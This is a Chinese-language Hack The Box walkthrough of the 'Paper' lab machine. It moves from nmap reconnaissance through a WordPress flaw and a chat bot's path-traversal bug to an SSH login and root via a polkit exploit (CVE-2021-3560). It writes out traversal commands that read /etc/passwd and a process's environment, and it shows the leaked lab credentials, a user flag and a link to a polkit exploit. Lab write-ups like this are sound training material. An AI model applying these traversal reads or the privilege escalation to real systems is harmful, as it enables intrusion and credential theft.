[Hack The Box] HTB—Paper walkthrough
一、信息搜集
namp
nmap -sV 10.10.11.143
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
具体探测端口
nmap -sC -sV -n -T5 -p 22,80,443 10.10.11.143
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-title: 400 Bad Request
| tls-alpn:
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
X-Backend-Server
通过响应头找主机名
curl -I http://10.10.11.143
HTTP/1.1 403 Forbidden
Date: Wed, 23 Feb 2022 07:10:06 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
目标网站返回
X-Backend-Server
包含潜在内部/隐藏 IP 地址或主机名的标头。通过暴露的这些值,攻击者可能会绕过安全代理并直接访问主机。
X-Backend-Server响应标头显示office.paper
为主机名。添加到hosts
文件中。
10.10.11.143 office.paper
二、网站渗透
访问office.paper
Wappalyzer 探测出是 WordPress CMS
版本5.2.3
搜到一个未授权漏洞CVE-2019-17671:Wordpress未授权访问漏洞复现
评论这里也有提示
http://office.paper/?static=1
hosts里面加上
10.10.11.143 chat.office.paper
http://chat.office.paper/register/8qozr226AhkCHZdyY
bot leads to LFI
注册完后登陆,会弹出一个群聊,里头有个机器人recyclops,可以取文件
3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file sale/secret.xls' or just 'recyclops file test.txt'
私聊他,有LFI漏洞
recyclops file ../../../../../etc/passwd
recyclops file ../../../../../proc/self/environ //找这个机器人的环境变量
# PWD=/home/dwight/hubot
ROCKETCHAT_PASSWORD=Queenofblad3s!23
LOGNAME=dwight
也可以看
recyclops file ../../../../../../../home/dwight/hubot/.env
/proc/self/目录
在进程的pid不清楚的情况下,可以访问**/proc/self/目录,不同的进程访问该目录时获得的信息是不同的,内容等价于/proc/本进程pid/**,进程可以通过访问/proc/self/目录来获取自己的系统信息。
dwight/Queenofblad3s!23
ssh登陆即可
ssh dwight@10.10.11.143
拿到用户flag 09a8dddaa9a016a11a80c433b17eadee
三、提权
linpeas扫描出CVE-2021-3560 Polkit权限提升漏
CVE-2021-3560 是 polkit 上的身份验证绕过,它允许非特权用户使用 DBus 调用特权方法。
Polkit
是 Linux 授权系统的一部分,集成了systemd
它的操作,并且比传统的sudo系统更具可配置性。它有时被称为sudo of systemd
CVE-2021-3560 poc
https://github.com/Almorabea/Polkit-exploit
上传py脚本并运行
python3 1.py
参考wp:
https://ethicalhacs.com/paper-hackthebox-walkthrough/